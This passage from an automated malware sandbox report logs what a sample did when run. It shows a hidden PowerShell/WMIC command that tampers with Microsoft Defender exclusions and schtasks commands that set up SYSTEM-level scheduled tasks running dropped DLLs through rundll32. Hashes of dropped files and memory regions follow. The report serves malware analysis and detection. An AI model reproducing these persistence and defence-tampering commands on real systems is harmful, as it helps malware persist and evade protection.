C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RNplELueU\NmZRxx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wgFtIVrBuHdIdLf" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wgFtIVrBuHdIdLf2" /F /xml "C:\Program Files (x86)\RNplELueU\vZNxxRN.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "wgFtIVrBuHdIdLf"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wgFtIVrBuHdIdLf"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tIlFGqArMHXptH" /F /xml "C:\Program Files (x86)\nWWVEJXizSHU2\LQykrfJ.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IkBmJZAegNpZy2" /F /xml "C:\ProgramData\evUSZSaqPkAEukVB\YmbavVl.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PAxmAUNtgsWrISWfx2" /F /xml "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\MAfzojb.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OurksSTJxLQIbfTMDbR2" /F /xml "C:\Program Files (x86)\fLdzueVMGzfAC\TWvxtwp.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vczjtXgpVbXDKOBgh" /SC once /ST 01:29:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\XwIFwyvoUqntekhn\DPmrbdwF\RQsjspG.dll\",#1 /gdidrMIF 385137" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vczjtXgpVbXDKOBgh"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QVuDljbAZykxnpoWI"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4272 -s 20602⤵
- Program crash
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\XwIFwyvoUqntekhn\DPmrbdwF\RQsjspG.dll",#1 /gdidrMIF 3851371⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\XwIFwyvoUqntekhn\DPmrbdwF\RQsjspG.dll",#1 /gdidrMIF 3851372⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vczjtXgpVbXDKOBgh"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\$RECYCLE.BIN\S-1-5-18\desktop.iniFilesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
C:\Program Files (x86)\RNplELueU\vZNxxRN.xmlFilesize
2KB
MD50f893d82f1ca92770507435491b4a0a7
SHA13c7f95acab7dc0878a51d535bebc4049150e589f
SHA2569208535e981be1f90410d04eade85dbaed432b4c1de6c8fc7c03d61e322dc1eb
SHA5123b56668e2a870be4961bb71a8d88c16103d0476b96756a2df8ce8eed57037c6dcd3d0007f2723a216e13a82bf9a76a6aec1866240e689486ea54b0de48697c17
-
C:\Program Files (x86)\fLdzueVMGzfAC\TWvxtwp.xmlFilesize
2KB
MD530e788c9418b7d4440fdfe8cc9eb4ef1
SHA1ad727c36a84a30f676e7ac0bdc6258ee7240c0a2
SHA2563a3570c7232f754354e5f656593a6a6db616526e7566d164745e22ebadd1cd0e
SHA51239de0920205df38afe2dbb3d5e919031205cdfbc62ada824a03ce1ca23a0ff09add28a76c6d1b5e8d174f756d00974d5dd12394308958ea64c4892f26ae3c434
-
C:\Program Files (x86)\nWWVEJXizSHU2\LQykrfJ.xmlFilesize
2KB
MD5f74c3718cdd9699f91fc534a5b8f9ba8
SHA18b7ad8e4965872fe7f909b056e91169aee8021d9
SHA25693913a180c26421d9a69f5b9b3ffa56a5288880692ed74cadbeb599fb52b1d76
SHA5125323851bcc3677dcf4acced3ea8323051ae5d4f059877ae428b22a6400ac2639b7061fcd41d94388e33e30b5766bf7cceb90734ee76602f3f80fc4c1da00c3ed
-
C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\MAfzojb.xmlFilesize
2KB
MD5af081ac08cd8e28d9590c65bc849d5aa
SHA10edd401e386c0dd07b9d0096a88887b74f3fdb4d
SHA256019054fae193eab5a4ddea0a91fbaffc2f18e7443098c97e9b6c71332afe1086
SHA512619a46f4e3abae7875d9a8583bde1d02994cd2b5991193612893cdc555dc5666467df240285485950076f4741cd014554ce22954523437161d3d11345290a0c7
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.5MB
MD55687a100efa53ab00115fd30c1571faa
SHA18cadd532c980b39f7d873df544f38fe0d4fe3782
SHA2568564d786f07d513f4d8be59b63b2d5119f491e84dfa68081c83bb67c16481716
SHA5125c235170e78bb8c8c4d2152bbef5d4e986aaac7aba3c37ff0b8979eb740f1473db2e877245c0626578d160df132b39c74d5169194567f15be961ed86c83efe46
-
C:\ProgramData\evUSZSaqPkAEukVB\YmbavVl.xmlFilesize
2KB
MD5170c87f7e8ad90e17c00b38434b5f376
SHA1365aa96d3d7aa7a9c74c54f22cac32a8227681d1
SHA256cb6eef9a8653e7fbc7b22ce38e7de62c2c3d57970370a4ee4bc421ae9a7b47eb
SHA512c297e6995ef260b3da75a264468939e99c9cb1e427a9f7c1146db47f376eb1140bb44423b7d7395b09cf9decb8370216f582bdf49bfe6396dcdc124d4b54341b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD571449ca417357691bff669ff2a2581c0
SHA14bf24738b15cbed6c2b5e568e84c6af334e09c47
SHA2560ba5acb93a28012d04ea2315fee0e6beda1bcc295e57754e58fcd28e172660fa
SHA512bda85a4cf37745a84d86252597bc0c201dcac882af1f8d9eaf5f4dfd1fe00419b60e4a9c53f9a5e1fc3af81ff8284ce952d9a610772cc35aa470a029803e648b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
30KB
MD57a90bcea97696c60f076ef98c74ee883
SHA12f3f3e87ffd5f5f4378a1ac53cb8ab1d4870a25c
SHA256819ff99bb313d2ceb9a75494d1a2c452735f91654b04d57561e15d8c625c661e
SHA512ab29becfed6f99c9dd6d716801eb182408b21cb24a139f6af43bb0e9fc7302b046a08b1e0e131ec7a22edf3489de7b6b2661614708d272dec823f29428c25ba5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
12KB
MD529dde232e3bdd52c247f94359ec53486
SHA17fa9766245ad79ed72d8cf5c4e5b22b1ec0bf521
SHA2561d99fb58940e1c6a0c7634d61548f38837791b505389f8b03dbafd20749371cf
SHA51274a49e8a1f2824642b37419279de5157b7fb6f40efd7485af8102310446ba25e6acbf2b659fbfef9eba063e42e1b89d10fb7fcc6321575a0ad812b38d961b5b0
-
C:\Users\Admin\AppData\Local\Temp\7zS6FF0.tmp\Install.exeFilesize
6.4MB
MD516c6176a7a12f11ef3f13ba4302a40f8
SHA13c53562968631f504024a22e59e2b4a177ab9188
SHA256f4543b5caf1f43d5bccb276d349df84d0c5987e4619143813de456625bd6a297
SHA512c0edc9de7d40d1bc688f1adb61cfad9265b09ad35fcf2dd09593f78247e8faf036742695256d62901c0ef6858342b5da1837daf11223fb95adcf032d76819d63
-
C:\Users\Admin\AppData\Local\Temp\7zS7251.tmp\Install.exeFilesize
6.7MB
MD57d81480dc33ed5603a660ab787ba942b
SHA104e0360d151b0c30778f3f747d43bd80785310a3
SHA256a63e0ec7bf6eee3581885b2d8e0a4b9fc33922c734591704925f15ffc2f257c4
SHA512834cfae4be9f95429ce40ef492a6089766c0e8b39748a8ef905d25785693947a4aaa1dd6c18a3d0698b278f7aef5159955b86e091f8cff8b95883679ad303bbf
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v31rwifc.qik.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs.jsFilesize
6KB
MD5f078907e7d45103452bb931acc3ccc4d
SHA1fdea03d1a122bf6e1cc39e0774a7dc56672b8a66
SHA2561eb96c92a75d72219b50885e550a65c44f6619bdcd98732683bd670009403995
SHA51228856d26c537841d1cd6caacb12b4d2cdd68bb14e6570cf7f1b8ea00b5bc4774fc67d11e860a52d862cb37f772ddd320a97c7a2cf4a6e42b6cf3d9ea9151e7fa
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD5e33ed3d4cc9b2e5a08ae25747ef47620
SHA1e2f4cfdd39bcb2eb1c05648a37a3d8536eaf19b7
SHA2560e7093450fb6bb5201b4291033daf6099881421ab47b122972e0249ef5b45a4f
SHA5129e990f7ca202c7ecc7a21dd2433055b71bd62f2e524f4702b674316effeb8fa37e891d40f3e6a960380dd7967033c7a7f235e73a3c434e97495e532309b4f95e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
12KB
MD5ddfdcd54c44dd527972206070eb0ab5d
SHA1d61556b0c67ec8353cbfa6319ea7d026bd74c2d1
SHA256ea1feff01f1e70b4d87e481cca3c42bff2f32fc8d40977d54c3fb1ba14efd9fb
SHA512a775cf5a9d5ae93084dede2ad455088e7177c0c3d1f16623e154be66e5fcdd48016b28cc5fd55349346451c81f5de4153532861ae8a631bd95436be21e59bf52
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
12KB
MD5cacc9a0c7873a79ba37d93916e7fe4af
SHA10b157e1cf6973a9b0f67f4833c9768d34820a8e8
SHA256ce9354d30f4987ed5df5816b18defa3c223fc8d90de115a79f8d13283b805bdb
SHA5120b0b165af659b49c7e0e8c07a2fb5b7a33ecf5896f499e22139feea17e9818603b43a86e708a1ea8b595bb63b85001979887069de4aa1d9ed3a63908783e0668
-
C:\Windows\Temp\XwIFwyvoUqntekhn\DPmrbdwF\RQsjspG.dllFilesize
6.4MB
MD5d9a4c2736e6e08c43cf77d61d5b8f87c
SHA1e2fa6783deb4f4bd3c4b758ba7c0f419abfab430
SHA2566e6f7797071baa57831bb69a84f82950630c1bc252238b6e8b879cb6a02a1bf4
SHA512df4b4687a09c4065ed13931d069bf0e7b514b8812e1c7669f1813339118014a51a0f7dd0068e923c5edcfe8e175cda04c496cb34d5648d8dc577ebff49f526b0
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
6KB
MD5bdd360aa1f99d6845e74a2949420764e
SHA1c6ea07c26d20b42d31ed1da138b23d0d99bea2f4
SHA25639ca342a3ce556b75155117f3c0266c51a436300bb9cb276963e8212f09fc375
SHA5123fe0a35357ba7d8cbae057fab620b185d66bc06ed3e6a862655a93cf1006267feae9b82cb88f0c55ea11f8148be59eeb2cf9dd808972b1d0ddf518d3fcb4a462
-
memory/1504-45-0x0000000000D70000-0x0000000001430000-memory.dmpFilesize
6.8MB
-
memory/1504-46-0x0000000010000000-0x00000000110E6000-memory.dmpFilesize
16.9MB
-
memory/1504-116-0x0000000000D70000-0x0000000001430000-memory.dmpFilesize
6.8MB
-
memory/1904-163-0x0000000007910000-0x000000000795B000-memory.dmpFilesize
300KB
-
memory/1904-151-0x0000000006CD0000-0x0000000007020000-memory.dmpFilesize
3.3MB
-
memory/1920-53-0x0000000007360000-0x00000000073AB000-memory.dmpFilesize
300KB
-
memory/1920-52-0x0000000006DB0000-0x0000000007100000-memory.dmpFilesize
3.3MB
-
memory/2336-27-0x0000000008400000-0x000000000844B000-memory.dmpFilesize
300KB
-
memory/2336-20-0x0000000004F10000-0x0000000004F46000-memory.dmpFilesize
216KB
-
memory/2336-21-0x0000000007630000-0x0000000007C58000-memory.dmpFilesize
6.2MB
-
memory/2336-22-0x00000000075F0000-0x0000000007612000-memory.dmpFilesize
136KB
-
memory/2336-23-0x0000000007EB0000-0x0000000007F16000-memory.dmpFilesize
408KB
-
memory/2336-24-0x0000000007F20000-0x0000000007F86000-memory.dmpFilesize
408KB
-
memory/2336-25-0x0000000007F90000-0x00000000082E0000-memory.dmpFilesize
3.3MB
-
memory/2336-26-0x0000000007D10000-0x0000000007D2C000-memory.dmpFilesize
112KB
-
memory/2336-28-0x0000000008770000-0x00000000087E6000-memory.dmpFilesize
472KB
-
memory/2372-90-0x000002053E790000-0x000002053E7B2000-memory.dmpFilesize
136KB
-
memory/2372-94-0x000002053EAB0000-0x000002053EB26000-memory.dmpFilesize
472KB
-
memory/4208-70-0x0000000006C50000-0x0000000006FA0000-memory.dmpFilesize
3.3MB
-
memory/4272-126-0x0000000010000000-0x00000000110E6000-memory.dmpFilesize
16.9MB
-
memory/4272-196-0x0000000003780000-0x00000000037E2000-memory.dmpFilesize
392KB
-
memory/4272-124-0x0000000000C50000-0x0000000001310000-memory.dmpFilesize
6.8MB
-
memory/4272-139-0x0000000002F70000-0x0000000002FF5000-memory.dmpFilesize
532KB
-
memory/4272-389-0x00000000041E0000-0x00000000042B9000-memory.dmpFilesize
868KB
-
memory/4272-379-0x0000000003FF0000-0x0000000004078000-memory.dmpFilesize
544KB
-
memory/4272-433-0x0000000000C50000-0x0000000001310000-memory.dmpFilesize
6.8MB
-
memory/4716-431-0x0000000004A30000-0x0000000005B16000-memory.dmpFilesize
16.9MB
-
memory/4988-43-0x0000000000D70000-0x0000000001430000-memory.dmpFilesize
6.8MB
-
memory/4988-17-0x00007FFBD08B0000-0x00007FFBD0A8B000-memory.dmpFilesize
1.9MB
-
memory/4988-13-0x0000000010000000-0x00000000110E6000-memory.dmpFilesize
16.9MB
-
memory/4988-12-0x0000000000D70000-0x0000000001430000-memory.dmpFilesize
6.8MB